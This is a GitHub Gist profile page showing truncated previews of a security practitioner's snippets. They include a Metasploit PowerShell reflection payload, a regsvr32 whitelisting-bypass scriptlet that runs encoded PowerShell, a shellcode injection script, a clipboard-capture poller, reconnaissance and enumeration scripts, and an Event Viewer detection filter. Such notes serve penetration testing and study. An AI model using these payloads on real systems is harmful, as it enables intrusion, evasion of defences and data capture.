Mario macostag

🏠
Working from home
View GitHub Profile
@macostag
macostag / capture-clip.py
Created May 7, 2018 00:23
Clipboard text capture
import pyperclip
import time

# Poll the clipboard every 2 seconds and print its current text content.
while True:
    if pyperclip.paste() != 'None':
        print(pyperclip.paste())
    time.sleep(2)
macostag / event.xml
Created April 30, 2018 04:35
XML filtering in the Windows Event Viewer
<QueryList>
  <Query Id="1">
    <Select Path="Security">
      *[EventData[Data[@Name='param1'] and (Data='mssecsvc')]]
    </Select>
  </Query>
</QueryList>
macostag / pr.ps1
Last active September 4, 2025 09:00
Metasploit PowerShell Reflection Payload
function q3 {
    Param ($g7mWY, $y0ZK)
    $mvajw = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    return $mvajw.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($mvajw.GetMethod('GetModuleHandle')).Invoke($null, @($g7mWY)))), $y0ZK))
}
function tma3R {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $v7E9,
macostag / poc.sct
Last active April 16, 2018 03:29
POC Application whitelisting bypass regsvr32.exe
<?XML version="1.0"?><scriptlet><registration progid="Notes" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script><![CDATA[ var da = new ActiveXObject("WScript.Shell").Run("powershell -ENC
# Start postgresql services
> service postgresql start
# Initialize the database
> msfdb init
# Delete and reinitialize the database
> msfdb reinit
# Delete database and stop using it
macostag / iex-s.ps1
Last active March 11, 2018 17:29
Custom Invoke-Shellcode script
function Invoke-Shellcode
{
<#
.SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
macostag / powershell-enum.ps1
Last active March 10, 2018 19:16
Windows PowerShell enumeration cmdlets
#Local enumeration
#------------------------------
#Bios information
Get-WmiObject -Class Win32_Bios
#CPU info
Get-WmiObject -Class Win32_Processor
#Computer model info
Get-WmiObject -Class Win32_ComputerSystem
macostag / powershell-basics.ps1
Last active May 12, 2024 04:39
Windows PowerShell basics notes
#Powershell basics:
#Displays help information.
Get-Help *event*
Get-Help Get-EventLog
Get-Help Get-EventLog -Online
#Update help.
Update-Help
#Gets all commands that are installed on the computer, including cmdlets, aliases, functions, workflows, filters, scripts, and applications.
macostag / auto.rc
Last active February 8, 2020 23:09
Recon-ng v5 resource file
workspaces create "WORKSPACE NAME"
marketplace install recon/companies-contacts/pen
marketplace install recon/companies-domains/pen
marketplace install recon/companies-multi/shodan_org
marketplace install recon/companies-multi/whois_miner
marketplace install recon/companies-domains/viewdns_reverse_whois
marketplace install recon/companies-multi/github_miner
marketplace install recon/domains-hosts/brute_hosts
marketplace install recon/domains-hosts/bing_domain_web
macostag / Decrypt3DES.py
Created January 20, 2018 22:49
Decrypt hex strings using 3DES (ECB mode).
import binascii
import random
import hashlib
import base64
from pyDes import *
def decrypt3DES(skey,sdata):
    key = binascii.unhexlify(skey)
    data = binascii.unhexlify(sdata)
    key3DES = triple_des(key, ECB, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_NORMAL)